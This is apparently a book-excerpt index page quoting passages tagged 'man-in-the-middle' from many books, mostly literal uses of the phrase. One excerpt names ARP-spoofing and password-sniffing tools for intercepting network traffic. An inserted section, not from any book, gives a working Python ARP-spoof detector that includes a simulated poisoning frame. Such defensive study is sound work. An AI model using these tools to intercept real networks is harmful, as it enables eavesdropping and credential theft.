What he needed here was the bottom of the top, someone with a junior post in senior management. Riffle riffle went the invisible card index. Ah yes, Ryszard: early forties, Pole from the Ukraine, wife religious, lots of children. Pleasant chap. Drinking problem. Probably not destined to rise. Chekuskin put the coin in the slot and dialled. ‘Ryszard, yes, hello?’ Harried-sounding voice; a man in the middle of something. ‘Chekuskin here. Sorry to bother you –’ ‘I can’t really talk. Later would be better.’ ‘Of course, of course, whenever you can. Maybe a drink this evening?’ ‘I don’t know. I’ve a family do. God, this is the Solkemfib thing, isn’t it?’ ‘Well, yes. There’s some puzzlement at this end –’ ‘I’m sorry, Chekuskin, but really, that’s one to leave alone. No joy to be had there. And honestly, that’s all I can say.


pages: 538 words: 164,533

1968: The Year That Rocked the World by Mark Kurlansky

anti-communist, Berlin Wall, colonial rule, cuban missile crisis, desegregation, East Village, Electric Kool-Aid Acid Test, European colonialism, feminist movement, global village, Haight Ashbury, land reform, Marshall McLuhan, Mikhail Gorbachev, MITM: man-in-the-middle, Norman Mailer, post-industrial society, Ronald Reagan, South China Sea

He was seeking a more pure communism and said that he hoped eventually to completely abolish money. 1968 was the year of the “new man” concept. Che had sought to build the new man, the socialist who worked for the common good, was dedicated to the revolution, and was without selfishness and greed. Now the new man was sometimes referred to as “a man like Che.” Castro first spoke of the new man in a speech in May 1967, but 1968, with the “revolutionary offensive” under way, was the year of the new man. In the middle of his speech about the new offensive, Castro referred to another new phenomenon. “There almost exists an air route for those who take over planes.” The week of Fidel’s speech, National Airlines flight 28 took off from Tampa bound for Miami. After five minutes in the air, two Cuban exiles took out pistols, forced the flight attendant to open the cockpit, and shouted, “Havana! Havana!” It was the seventh recent hijacking to Cuba, the third that month.


pages: 661 words: 187,613

The Language Instinct: How the Mind Creates Language by Steven Pinker

Albert Einstein, cloud computing, David Attenborough, double helix, Drosophila, elephant in my pajamas, finite state, illegal immigration, Joan Didion, Loebner Prize, mass immigration, Maui Hawaii, meta analysis, meta-analysis, MITM: man-in-the-middle, natural language processing, out of africa, phenotype, rolodex, Ronald Reagan, Sapir-Whorf hypothesis, Saturday Night Live, speech recognition, Steven Pinker, theory of mind, transatlantic slave trade, Turing machine, Turing test, twin studies, Yogi Berra

Let loose on our page, it would create the following: * * * Socrates is a man Every man is mortal Socrates * * * Its second reflex, also in response to finding an isa, is to get itself to the right of that isa and copy any ink marks it finds there into the holes of a new cutout. In our case, this forces the processor to make a cutout in the shape of man. Its third reflex is to scan down the page checking for ink marks shaped like Every, and if it finds some, seeing if the ink marks to the right align with its new cutout. In our example, it finds one: the man in the middle of the second line. Its fourth reflex, upon finding such a match, is to move to the right and copy the ink marks it finds there onto the bottom center of the page. In our example, those are the ink marks ismortal. If you are following me, you’ll see that our page now looks like this: * * * Socrates isa man Every man ismortal Socrates ismortal * * * A primitive kind of reasoning has taken place.


pages: 840 words: 202,245

Age of Greed: The Triumph of Finance and the Decline of America, 1970 to the Present by Jeff Madrick

accounting loophole / creative accounting, Asian financial crisis, bank run, Bretton Woods, business cycle, capital controls, collapse of Lehman Brothers, collateralized debt obligation, credit crunch, Credit Default Swap, credit default swaps / collateralized debt obligations, desegregation, disintermediation, diversified portfolio, Donald Trump, financial deregulation, fixed income, floating exchange rates, Frederick Winslow Taylor, full employment, George Akerlof, Hyman Minsky, income inequality, index fund, inflation targeting, inventory management, invisible hand, John Meriwether, Kitchen Debate, laissez-faire capitalism, locking in a profit, Long Term Capital Management, market bubble, minimum wage unemployment, MITM: man-in-the-middle, money market fund, Mont Pelerin Society, moral hazard, mortgage debt, Myron Scholes, new economy, North Sea oil, Northern Rock, oil shock, Paul Samuelson, Philip Mirowski, price stability, quantitative easing, Ralph Nader, rent control, road to serfdom, Robert Bork, Robert Shiller, Ronald Coase, Ronald Reagan, Ronald Reagan: Tear down this wall, shareholder value, short selling, Silicon Valley, Simon Kuznets, technology bubble, Telecommunications Act of 1996, The Chicago School, The Great Moderation, too big to fail, union organizing, V2 rocket, value at risk, Vanguard fund, War on Poverty, Washington Consensus, Y2K, Yom Kippur War

Financial writer Michael Lewis, then a Salomon novice, in his first-person account of working at Salomon Brothers in these years, quoted Dall as saying of Ranieri, “He was tough-minded. He didn’t mind hiding a million-dollar loss from a manager, if that’s what it took. He didn’t let morality get in his way. Well, morality is not the right word, but you know what I mean.” Trading was the key to profits in the new mortgage department. Ranieri, the man in the middle, had the information about supply and demand and also the deep financial pockets of a house like Salomon. Ranieri was not merely aggressive and willing to cut corners; he was by every account smart. “I have never seen anyone, educated or uneducated, with a quicker mind,” said Dall, whom Ranieri eventually forced out of the department. But it was the struggles of the thrifts in the late 1970s and early 1980s that made his trading desk Salomon’s most profitable operation for several years.


pages: 659 words: 203,574

The Collected Stories of Vernor Vinge by Vernor Vinge

anthropic principle, Asilomar, back-to-the-land, dematerialisation, gravity well, invisible hand, low earth orbit, Machinery of Freedom by David Friedman, MITM: man-in-the-middle, source of truth, technological singularity, unbiased observer, Vernor Vinge

There was a shadow on the porch where no shadow should have been. Sanda slammed the bolt to just as the doorknob began to turn. Behind her, Grandmother stared in shocked silence. Sanda spun and ran toward the kitchen. Once they had the intruders locked out, what could she and Gran do without a phone? She nearly ran into him in the kitchen. Sanda sucked in a breath so hard she squeaked. He was big and hooded. He also had a knife. Strange to see such a man in the middle of the glistening white kitchen—the homey, comforting, safe kitchen. From the living room came the sound of splintering wood and Grandmother screamed. Running footsteps. Something metal being kicked over. Grandmother screamed again. “Shut your mouth, lady. I said, shut it.” The voice—though not the tone—was vaguely familiar. “Now where is that prissy little wimp?” “I got her in here,” called the man in the kitchen.


Ubuntu 15.04 Server with systemd: Administration and Reference by Richard Petersen

Amazon Web Services, bash_history, cloud computing, Debian, Firefox, Mark Shuttleworth, MITM: man-in-the-middle, RFC: Request For Comment, SpamAssassin, web application

The traceroute command will return a list of hosts the route traverses, along with the times for three probes sent to each gateway. Times greater than five seconds are displayed with an asterisk, *. traceroute rabbit.mytrek.com You can also use the mtr or xmtr tools to perform both ping and traces (Traceroute on the System Tools menu). Ettercap Ettercap is a sniffer program designed to detect Man in the Middle attacks. In this kind of attack, packets are detected and modified in transit to let an unauthorized user access a network. You can use either its graphical interface or its command line interface. Ettercap can perform Unified sniffing on all connections, or Bridged sniffing on a connection between network interfaces. Ettercap uses plugins for specific tasks, like dos_attack to detect Denial of Service attacks and dns-spoof for DNS spoofing detection.


pages: 706 words: 202,591

Facebook: The Inside Story by Steven Levy

active measures, Airbnb, Airbus A320, Amazon Mechanical Turk, Apple's 1984 Super Bowl advert, augmented reality, Ben Horowitz, blockchain, Burning Man, business intelligence, cloud computing, computer vision, crowdsourcing, cryptocurrency, don't be evil, Donald Trump, East Village, Edward Snowden, El Camino Real, Elon Musk, Firefox, Frank Gehry, glass ceiling, indoor plumbing, Jeff Bezos, John Markoff, Jony Ive, Kevin Kelly, Kickstarter, Lyft, Mahatma Gandhi, Marc Andreessen, Mark Zuckerberg, Menlo Park, Metcalfe’s law, MITM: man-in-the-middle, move fast and break things, natural language processing, Network effects, Oculus Rift, PageRank, Paul Buchheit, paypal mafia, Peter Thiel, pets.com, post-work, Ray Kurzweil, recommendation engine, Robert Mercer, Robert Metcalfe, rolodex, Sam Altman, Sand Hill Road, self-driving car, sexual politics, Shoshana Zuboff, side project, Silicon Valley, Silicon Valley startup, slashdot, Snapchat, social graph, social software, South of Market, San Francisco, Startup school, Steve Ballmer, Steve Jobs, Steven Levy, Steven Pinker, Tim Cook: Apple, web application, WikiLeaks, women in the workforce, Y Combinator, Y2K

It takes a certain amount of chutzpah to present people with a privacy tool whose purpose was to gain their data. Facebook now had a powerful way to monitor the mobile activity of thousands of users. The Growth team would study the data carefully, and post results in their regular meetings. Onavo paid special attention to Snapchat. Evan Spiegel’s company had security features to block intruders, but according to one Facebook executive, Onavo used a “man-in-the-middle” attack to get past the wall and gather data. Snapchat discovered this and put in protections to thwart the intrusions. With Onavo, a Facebook executive confirmed to me, the company was “able to inject code into Snap and could see how people were actually using the product internally.” (According to The Wall Street Journal, Snapchat would add this episode to a file it kept of Facebook’s actions, calling it “Project Voldemort,” after the Harry Potter villain whose name cannot be spoken.)


pages: 807 words: 225,326

Werner Herzog - a Guide for the Perplexed: Conversations With Paul Cronin by Paul Cronin

Albert Einstein, Atahualpa, Berlin Wall, Francisco Pizarro, Kickstarter, land reform, MITM: man-in-the-middle, out of africa

He talked about evading security guards when he was setting up the equipment he needed to make the walk from one tower to the other. He and a co-conspirator were about to be busted, so he started pushing his colleague aggressively, shouting things like, “You’re doing a lousy job! What’s the matter with you? I told you Tuesday, not Wednesday!” The two of them stormed off and the guard didn’t dare say anything. No one wants to interfere with a man in the middle of a fight. Philippe pointed out that the opposite also works, that people won’t bother you when you’re laughing your heart out. A participant at one Rogue session was a former hostage negotiator; he’ll surely make a fine filmmaker. Another told us the story of a film he was making in Portugal about street kids. He had been filming for weeks with a group and got release forms signed by every child and parent but one.


pages: 747 words: 218,317

Look Homeward, Angel by Thomas Wolfe

fear of failure, index card, MITM: man-in-the-middle, Own Your Own Home

I knew at once when you stopped using that pony. Your translation is not so smooth, but it's your own now. You're doing good work, my boy, and you're getting something out of it. It's worth it, isn't it?" "Yes," said Eugene gratefully, "it certainly is--" By far the most distinguished of his teachers this first year was Mr. Edward Pettigrew ("Buck") Benson, the Greek professor. Buck Benson was a little man in the middle-forties, a bachelor, somewhat dandified, but old-fashioned, in his dress. He wore wing collars, large plump cravats, and suede-topped shoes. His hair was thick, heavily grayed, beautifully kept. His face was courteously pugnacious, fierce, with large yellow bulging eyeballs, and several bulldog pleatings around the mouth. It was an altogether handsome ugliness. His voice was low, lazy, pleasant, with an indolent drawl, but without changing its pace or its inflection he could flay a victim with as cruel a tongue as ever wagged, and in the next moment wipe out hostility, restore affection, heal all wounds by the same agency.


pages: 669 words: 210,153

Tools of Titans: The Tactics, Routines, and Habits of Billionaires, Icons, and World-Class Performers by Timothy Ferriss

Airbnb, Alexander Shulgin, artificial general intelligence, asset allocation, Atul Gawande, augmented reality, back-to-the-land, Ben Horowitz, Bernie Madoff, Bertrand Russell: In Praise of Idleness, Black Swan, blue-collar work, Boris Johnson, Buckminster Fuller, business process, Cal Newport, call centre, Charles Lindbergh, Checklist Manifesto, cognitive bias, cognitive dissonance, Colonization of Mars, Columbine, commoditize, correlation does not imply causation, David Brooks, David Graeber, diversification, diversified portfolio, Donald Trump, effective altruism, Elon Musk, fault tolerance, fear of failure, Firefox, follow your passion, future of work, Google X / Alphabet X, Howard Zinn, Hugh Fearnley-Whittingstall, Jeff Bezos, job satisfaction, Johann Wolfgang von Goethe, John Markoff, Kevin Kelly, Kickstarter, Lao Tzu, lateral thinking, life extension, lifelogging, Mahatma Gandhi, Marc Andreessen, Mark Zuckerberg, Mason jar, Menlo Park, Mikhail Gorbachev, MITM: man-in-the-middle, Nelson Mandela, Nicholas Carr, optical character recognition, PageRank, passive income, pattern recognition, Paul Graham, peer-to-peer, Peter H. Diamandis: Planetary Resources, Peter Singer: altruism, Peter Thiel, phenotype, PIHKAL and TIHKAL, post scarcity, post-work, premature optimization, QWERTY keyboard, Ralph Waldo Emerson, Ray Kurzweil, recommendation engine, rent-seeking, Richard Feynman, risk tolerance, Ronald Reagan, selection bias, sharing economy, side project, Silicon Valley, skunkworks, Skype, Snapchat, social graph, software as a service, software is eating the world, stem cell, Stephen Hawking, Steve Jobs, Stewart Brand, superintelligent machines, Tesla Model S, The Wisdom of Crowds, Thomas L Friedman, Wall-E, Washington Consensus, Whole Earth Catalog, Y Combinator, zero-sum game

To learn about some of the starting tools a hacker, attacker, or someone just curious about security would use, I’d suggest looking at beginning tools such as Wireshark, Charles (web debugging proxy), NightHawk (ARP/ND spoofing and password sniffing), arpy (ARP spoofing), dsniff (password sniffing), and Kali Linux (penetration testing) and looking up tutorials on network intrusion, sniffing, and man-in-the-middling. Within a few minutes and with a tool like Wireshark, you can start seeing all the traffic going in and out of your computer, while tools like Nighthawk and arpy in conjunction with Wireshark can help you inspect and intercept all traffic on a network! To further dive into security, I’d suggest learning to program. It’s easier than you think! Learning to program allows you to learn how someone might engineer something and helps you think about how you can then reverse that and exploit it, as if you had created it yourself.
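The excerpt above points at ARP-spoofing and sniffing tools without showing what such an attack looks like on the wire. The following is an added example, not code from Tools of Titans nor from any of the tools it names: a small ARP-spoof detector of the kind arpwatch-style tools implement. It parses raw Ethernet+ARP frames, records each sender IP-to-MAC binding it sees, and alerts when an IP already bound to one MAC is claimed by another, which is exactly the effect an arpy/NightHawk-style poisoner produces when it claims the gateway's address. All addresses and frames in `run_sample()` are constructed for the demonstration; on a real network you would feed `ArpWatch.observe()` frames read from a raw socket or a pcap file instead.

```python
import struct

ETH = struct.Struct("!6s6sH")            # dst MAC, src MAC, EtherType
ARP = struct.Struct("!HHBBH6s4s6s4s")    # htype, ptype, hlen, plen, opcode, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
OP_REQUEST, OP_REPLY = 1, 2
BROADCAST = b"\xff" * 6


def mac_bytes(s): return bytes(int(x, 16) for x in s.split(":"))
def ip_bytes(s): return bytes(int(x) for x in s.split("."))
def mac_str(b): return ":".join(f"{x:02x}" for x in b)
def ip_str(b): return ".".join(str(x) for x in b)


def build_arp(opcode, sender_mac, sender_ip, target_mac, target_ip):
    """Assemble an Ethernet+ARP frame; used here only to construct sample traffic."""
    dst = BROADCAST if opcode == OP_REQUEST else mac_bytes(target_mac)
    eth = ETH.pack(dst, mac_bytes(sender_mac), ETHERTYPE_ARP)
    arp = ARP.pack(1, 0x0800, 6, 4, opcode,
                   mac_bytes(sender_mac), ip_bytes(sender_ip),
                   mac_bytes(target_mac), ip_bytes(target_ip))
    return eth + arp


def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip, target_ip), or None for non-ARP or malformed frames."""
    if len(frame) < ETH.size + ARP.size:
        return None
    _dst, _src, ethertype = ETH.unpack_from(frame, 0)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, opcode, sha, spa, _tha, tpa = ARP.unpack_from(frame, ETH.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):   # only Ethernet/IPv4 ARP
        return None
    return opcode, mac_str(sha), ip_str(spa), ip_str(tpa)


class ArpWatch:
    """Track IP -> MAC bindings seen on the wire and flag any rebinding of a known IP."""

    def __init__(self):
        self.bindings = {}

    def observe(self, frame):
        parsed = parse_arp(frame)
        if parsed is None:
            return None
        opcode, mac, ip, _tpa = parsed
        if ip == "0.0.0.0":            # ARP probe (RFC 5227): asserts no binding
            return None
        known = self.bindings.get(ip)
        if known is None:
            self.bindings[ip] = mac    # first sighting: learn it
            return None
        if known != mac:               # same IP, different MAC: classic poisoning signature
            kind = "reply" if opcode == OP_REPLY else "request"
            return f"ALERT: {ip} moved from {known} to {mac} (ARP {kind})"
        return None


def run_sample():
    """Constructed traffic: the gateway answers normally, then an attacker claims the gateway IP."""
    gw_mac, gw_ip = "00:11:22:33:44:01", "192.168.1.1"
    victim_mac, victim_ip = "00:11:22:33:44:02", "192.168.1.10"
    atk_mac = "de:ad:be:ef:00:01"                       # hypothetical attacker MAC
    frames = [
        build_arp(OP_REQUEST, victim_mac, victim_ip, "00:00:00:00:00:00", gw_ip),
        build_arp(OP_REPLY, gw_mac, gw_ip, victim_mac, victim_ip),
        build_arp(OP_REPLY, gw_mac, gw_ip, victim_mac, victim_ip),    # repeat, same binding: no alert
        build_arp(OP_REPLY, atk_mac, gw_ip, victim_mac, victim_ip),   # poisoned reply: alert
        b"\x00" * 20,                                                # junk, ignored
    ]
    watch = ArpWatch()
    return [alert for alert in (watch.observe(f) for f in frames) if alert]


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

A binding change is a signal, not proof: DHCP reassignments and router failover (VRRP/HSRP) legitimately move an IP between MACs, so production tools log the change and let an operator decide. The stronger defence is not on the host at all but on the switch (DHCP snooping with Dynamic ARP Inspection) or in static ARP entries for the gateway on hosts that matter.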


The Oil Kings: How the U.S., Iran, and Saudi Arabia Changed the Balance of Power in the Middle East by Andrew Scott Cooper

addicted to oil, anti-communist, Ayatollah Khomeini, banking crisis, Boycotts of Israel, energy security, falling living standards, friendly fire, full employment, interchangeable parts, Kickstarter, land reform, MITM: man-in-the-middle, oil shale / tar sands, oil shock, peak oil, Ponzi scheme, RAND corporation, rising living standards, Robert Bork, rolodex, Ronald Reagan, strikebreaker, unbiased observer, uranium enrichment, urban planning, Yom Kippur War

Ford Library. 284 $20 million over five years: Pranay Gupte, “Lobbyists in Iran Paid by Grumman,” New York Times, December 13, 1975. 284 “It was normal practice”: Ibid. 284 Members of Congress demanded to know: Ibid. 284 second $200 million loan offered: Ibid. 284 an audit prepared by Northrop Corporation’s accounting firm: Ibid. 284 $200 million in kickbacks: Michael C. Jensen, “Bribes by Northrop of $450,000 for 2 Saudi Generals Reported,” New York Times, June 5, 1975. 284 Prominent among the “sales agents”: William H. Jones, “Northrop’s Man in the Middle East,” Washington Post, June 7, 1975. 284 leveraged his background in intelligence: David Binder, “Northrop Cites Undercover Role,” New York Times, June 7, 1975. 284 “running close to a billion dollars”: Ibid. 284 “old personal friend”: Ibid. 284 “The Shah could not have been more cordial personally”: Ibid. 284 Roosevelt to ask the Shah to lobby: Gaylord Shaw, “Senate Unit Tells of More Northrop Payoffs Abroad,” Los Angeles Times, June 7, 1975. 285 paid $2,697,067: Martin R.


America in the World by Robert B. Zoellick

Albert Einstein, anti-communist, banking crisis, battle of ideas, Berlin Wall, Bretton Woods, British Empire, Corn Laws, coronavirus, cuban missile crisis, defense in depth, Deng Xiaoping, Donald Trump, Douglas Engelbart, energy security, European colonialism, facts on the ground, Fall of the Berlin Wall, hypertext link, illegal immigration, immigration reform, imperial preference, Isaac Newton, Joseph Schumpeter, land reform, Mikhail Gorbachev, MITM: man-in-the-middle, Monroe Doctrine, mutually assured destruction, Norbert Wiener, Paul Samuelson, RAND corporation, reserve currency, Ronald Reagan, Ronald Reagan: Tear down this wall, Scramble for Africa, Silicon Valley, The Wealth of Nations by Adam Smith, trade liberalization, transcontinental railway, undersea cable, Vannevar Bush, War on Poverty

McCullough, Truman, 530. 39. Lawrence Kaplan, The Conversion of Senator Arthur H. Vandenberg: From Isolation to International Engagement (Lexington, KY: University Press of Kentucky, 2015), 87 (citing Vandenberg’s papers) and 169. 40. See Haas, Harry and Arthur, 2 for forty-seven days; Kaplan, Conversion, 1–3 (citing James Reston in 1948 on “qualities of enterprise”); and Hendrik Meijer, Arthur Vandenberg: The Man in the Middle of the American Century (Chicago: University of Chicago Press, 2017), 4–6, 70, 119. 41. Meijer, Vandenberg, 4. 42. Meijer, Vandenberg, 6–9; Kaplan, Conversion, 2–4. 43. Kaplan, Conversion, 3–4, 8, 11–14; Meijer, Vandenberg, 16. 44. Vandenberg believed that Alexander Hamilton represented a superior mix of nationalism, conservativism, and progressivism. The activist editor, a rapid writer, published in the 1920s two biographies of Hamilton.


pages: 903 words: 235,753

The Stack: On Software and Sovereignty by Benjamin H. Bratton

1960s counterculture, 3D printing, 4chan, Ada Lovelace, additive manufacturing, airport security, Alan Turing: On Computable Numbers, with an Application to the Entscheidungsproblem, algorithmic trading, Amazon Mechanical Turk, Amazon Web Services, augmented reality, autonomous vehicles, basic income, Benevolent Dictator For Life (BDFL), Berlin Wall, bioinformatics, bitcoin, blockchain, Buckminster Fuller, Burning Man, call centre, carbon footprint, carbon-based life, Cass Sunstein, Celebration, Florida, charter city, clean water, cloud computing, connected car, corporate governance, crowdsourcing, cryptocurrency, dark matter, David Graeber, deglobalization, dematerialisation, disintermediation, distributed generation, don't be evil, Douglas Engelbart, Edward Snowden, Elon Musk, en.wikipedia.org, Eratosthenes, Ethereum, ethereum blockchain, facts on the ground, Flash crash, Frank Gehry, Frederick Winslow Taylor, future of work, Georg Cantor, gig economy, global supply chain, Google Earth, Google Glasses, Guggenheim Bilbao, High speed trading, Hyperloop, illegal immigration, industrial robot, information retrieval, Intergovernmental Panel on Climate Change (IPCC), intermodal, Internet of things, invisible hand, Jacob Appelbaum, Jaron Lanier, Joan Didion, John Markoff, Joi Ito, Jony Ive, Julian Assange, Khan Academy, liberal capitalism, lifelogging, linked data, Mark Zuckerberg, market fundamentalism, Marshall McLuhan, Masdar, McMansion, means of production, megacity, megastructure, Menlo Park, Minecraft, MITM: man-in-the-middle, Monroe Doctrine, Network effects, new economy, offshore financial centre, oil shale / tar sands, packet switching, PageRank, pattern recognition, peak oil, peer-to-peer, performance metric, personalized medicine, Peter Eisenman, Peter Thiel, phenotype, Philip Mirowski, Pierre-Simon Laplace, place-making, planetary scale, RAND corporation, recommendation engine, reserve currency, RFID, Robert Bork, Sand Hill Road, self-driving car, semantic web, sharing economy, Silicon Valley, Silicon Valley ideology, Slavoj Žižek, smart cities, smart grid, smart meter, social graph, software studies, South China Sea, sovereign wealth fund, special economic zone, spectrum auction, Startup school, statistical arbitrage, Steve Jobs, Steven Levy, Stewart Brand, Stuxnet, Superbowl ad, supply-chain management, supply-chain management software, TaskRabbit, the built environment, The Chicago School, the scientific method, Torches of Freedom, transaction costs, Turing complete, Turing machine, Turing test, undersea cable, universal basic income, urban planning, Vernor Vinge, Washington Consensus, web application, Westphalian system, WikiLeaks, working poor, Y Combinator

For Sino-Google geopolitics, the platform could theoretically be available at a billion-user scale to those who live in China, even if Google is not technically “in China,” because those Users, acting through and as foreign proxies, are themselves, as far as the Internet geography is concerned, both in and not in China. Developers of uProxy believe that it would take two simultaneous and synchronized man-in-the-middle attacks to hack the link, and at population scale, that should prove difficult even for the best state actors, for now. (More disconcerting perhaps is that such a framework could just as easily be used to withdraw data from a paired site—a paired “user”—that for good reasons should be left alone.) Any plural User subject that is conjoined by a proxy link or other means could be composed of different types of addressable subjects: two humans in different countries, or a human and a sensor, a sensor and a bot, a human and a robot and a sensor, a whatever and a whatever.


pages: 965 words: 267,053

A History of Zionism by Walter Laqueur

Albert Einstein, anti-communist, British Empire, business cycle, illegal immigration, joint-stock company, land reform, Mahatma Gandhi, mass immigration, means of production, MITM: man-in-the-middle, new economy, plutocrats, Plutocrats, profit motive, strikebreaker, the market place, éminence grise

Many liberals and Socialists felt that national distinctions were losing their importance all over the world, and that the Jews, because they had no national home, would be in the vanguard of this movement towards one global culture, one way of life. They did not share the belief that God had created peoples to exist forever and that each of them had an eternal mission. One of the heroes in Gottfried Keller’s Fähnlein der sieben Aufrechten, a stalwart Swiss patriot, raised the question in discussion with his friends: Just as a man in the middle of his life and at the height of his strength will think of death, so he should consider in a quiet hour that his fatherland will vanish one day … because everything in this world is subject to change … is it not true that greater nations than ours have perished? Or do you want to continue existing like the Eternal Jew who cannot die, who has buried Egypt, Greece, and Rome and is still serving the newly emerged peoples?


George Marshall: Defender of the Republic by David L. Roll

anti-communist, British Empire, Charles Lindbergh, David Brooks, Defenestration of Prague, Donald Trump, European colonialism, fear of failure, invisible hand, MITM: man-in-the-middle, Monroe Doctrine, mutually assured destruction, one-China policy, one-state solution, Ralph Waldo Emerson, Simon Kuznets, South China Sea, Steve Jobs, trade liberalization, Works Progress Administration, yellow journalism

New York: Simon & Schuster, 1992. McFarland, Keith, and David L. Roll. Louis Johnson and the Arming of America: The Roosevelt and Truman Years. Bloomington: Indiana University Press, 2005. Medoff, Rafael. Jewish Americans and Political Participation. Santa Barbara, CA: ABC-CLIO, 2002. Mee, Charles L. Jr. The Marshall Plan. New York: Simon & Schuster, 1984. Meijer, Hendrik. Arthur Vandenberg: The Man in the Middle of the American Century. Chicago: University of Chicago Press, 2017. Melby, John F. The Mandate of Heaven: Record of a Civil War, China 1945–49. Garden City, NY: Anchor Books, 1971. Miller, Merle. Plain Speaking: An Oral Biography of Harry S. Truman. New York: Black Dog & Leventhal, 2005. Millis, Walter, ed. The Forrestal Diaries. New York: Viking, 1951. Mills, Nicolaus. Winning the Peace: The Marshall Plan & America’s Coming of Age as a Superpower.


pages: 1,212 words: 312,349

Dhalgren by Samuel R. Delany

MITM: man-in-the-middle, sexual politics

Which is a good introduction to why over the charred grass stopped conversation. A climb across rocks and among green brush jarred it loose again. Cathedral told Priest the black stone building in the smoke was the Weather Tower. I still don't see any vanes, aerials, or anemometers. We came around a corner, left hips brushing head-sized stones, right hips (elbows up) scratched by bushes. The man in the middle of the court was bent over a tripod. As we came toward him, he looked up: Captain Kamp. Who still didn't recognize me until we were on top of him. "…Kid?" "Hello, Captain." He laughed now. "Now you fellows looked pretty ominous coming across there." He debated whether to give his hand for shaking. Which Angel solved by giving his. They hooked thumbs. "Angel," Angel said. The pink and brown fists locked, shook.


pages: 1,327 words: 360,897

Demanding the Impossible: A History of Anarchism by Peter Marshall

agricultural Revolution, anti-communist, anti-globalists, Bertrand Russell: In Praise of Idleness, clean water, collective bargaining, colonial rule, David Graeber, different worldview, do-ocracy, feminist movement, garden city movement, hive mind, Howard Zinn, invisible hand, laissez-faire capitalism, land reform, land tenure, Lao Tzu, liberation theology, Machinery of Freedom by David Friedman, Mahatma Gandhi, means of production, MITM: man-in-the-middle, Naomi Klein, open borders, Panopticon Jeremy Bentham, plutocrats, Plutocrats, post scarcity, profit motive, Ralph Waldo Emerson, road to serfdom, Ronald Reagan, sexual politics, the market place, union organizing, wage slave, washing machines reduced drudgery

Woodcock has suggested that in their view of man’s place in the world, anarchists believed in a modified version of the Great Chain of Being.9 In fact, the conception of the universe as a Chain of Being, and the principles which underline this conception — plenitude, continuity, and gradation — were deeply conservative. Moreover, the hierarchical cosmogony of the Chain of Being, with its gradations from beast to angels with man in the middle, reflected the social hierarchy of the period. In the eighteenth century, it led to the belief that there could be no improvement in the organization of society and to Pope’s conclusion that ‘whatever is, is right’.10 Indeed, it was only towards the end of the eighteenth century when the static notion of a Chain of Being was temporalized and replaced by a more evolutionary view of nature that progressive thinkers began to appeal to nature as a touchstone to illustrate the shortcomings of modern civilization.


pages: 1,199 words: 384,780

The system of the world by Neal Stephenson

bank run, British Empire, cellular automata, Edmond Halley, Fellow of the Royal Society, high net worth, Isaac Newton, James Watt: steam engine, joint-stock company, large denomination, MITM: man-in-the-middle, place-making, the market place, trade route, transatlantic slave trade

He’d been conversing with a sedan-porter, but had broken off to stare at the buyer’s hackney. Indeed many were now staring at it, for it was smoking. And it was making booms as the passenger flailed against the roof, signalling the driver to stop. The door on the right side flew open and disgorged a cloud of brown-gray smoke. So dense and voluminous was this, that a long and careful inspection was needed to see that there was a man in the middle of it. He was staggering away from the carriage, headed for the parapet that surrounded the Square to limit the number of pedestrians who toppled into St. Mary’s Lock. The passenger looked like a figure from Ovid: a Cloud metamorphosing into a Man. For the smoke had saturated the long hooded cloak that he wore, and was still billowing out of it. Gagging, he shuffled toward the parapet. The hackney-driver scrambled round to the open door, probed into the smoke with his whip-handle, and after a bit of scratching about, dragged out a blackened carapace: a burnt box, still sputtering and jetting a sturdy plume of thick yellowish smoke.


pages: 1,318 words: 403,894

Reamde by Neal Stephenson

air freight, airport security, crowdsourcing, digital map, drone strike, Google Earth, industrial robot, informal economy, Jones Act, large denomination, megacity, MITM: man-in-the-middle, new economy, pattern recognition, Ponzi scheme, pre–internet, ransomware, side project, Skype, slashdot, South China Sea, the built environment, the scientific method, young professional

From the stairs they trooped out into the fifth-floor corridor, which conveniently for them was empty at the moment. Sokolov was leading the way, but as they passed 503 he looked over his shoulder and made room for Kautsky, the biggest man in the squad, the door breaker. Kautsky was armed with a combination sledge-hammer/ax/crowbar that could make short work of any door. The ones in this building looked particularly flimsy, so Sokolov had no worries about getting through rapidly. Kautsky would be their man in the middle, the first one through, who would hold the center and block the exit while the others flooded in behind him and flowed to the edges. Ivanov had no scripted part in this plan, since he was supposed to be waiting down in the van, but Sokolov hoped that he would have the good sense to stay well to the rear, in the hallway, long enough for things to get under control. Then he could come in and wreak whatever revenge it was that he had been dreaming of.


Wealth and Poverty of Nations by David S. Landes

"Robert Solow", Admiral Zheng, affirmative action, agricultural Revolution, Atahualpa, Ayatollah Khomeini, Bartolomé de las Casas, British Empire, business cycle, Cape to Cairo, clean water, colonial rule, Columbian Exchange, computer age, David Ricardo: comparative advantage, deindustrialization, deskilling, European colonialism, Fellow of the Royal Society, financial intermediation, Francisco Pizarro, germ theory of disease, glass ceiling, illegal immigration, income inequality, Index librorum prohibitorum, interchangeable parts, invention of agriculture, invention of movable type, invisible hand, Isaac Newton, James Watt: steam engine, John Harrison: Longitude, joint-stock company, Just-in-time delivery, Kenneth Arrow, land tenure, lateral thinking, mass immigration, Mexican peso crisis / tequila crisis, MITM: man-in-the-middle, Monroe Doctrine, Murano, Venice glass, new economy, New Urbanism, North Sea oil, out of africa, passive investing, Paul Erdős, Paul Samuelson, Philip Mirowski, rent-seeking, Right to Buy, Scramble for Africa, Simon Kuznets, South China Sea, spice trade, spinning jenny, The Wealth of Nations by Adam Smith, trade route, transaction costs, transatlantic slave trade, Vilfredo Pareto, zero-sum game

When Columbus met his first Indians, he could not get over their trust and friendliness; to this the Spaniards, frustrated for gold, returned bestialities unworthy of beasts: They came with their Horsemen well armed with Sword and Launce, making most cruel havocks and slaughters. . . . Overrunning Cities and Villages, where they spared no sex nor age; neither would their cruelty pity Women with childe, whose bellies they would rip up, taking out the Infant to hew it in pieces. They would often lay wagers who should with most dexterity either cleave or cut a man in the middle. . . . The children they would take by the feet and dash their innocent heads against the rocks, and when they were fallen into the water, with a strange and cruel derision they would call on them to swim. . . . They erected certains Gallowses . . . upon every one of which they would hang thirteen persons, blasphemously affirming that they did it in honour of our Redeemer and his Apostles, and then putting fire under them, they burnt the poor wretches alive.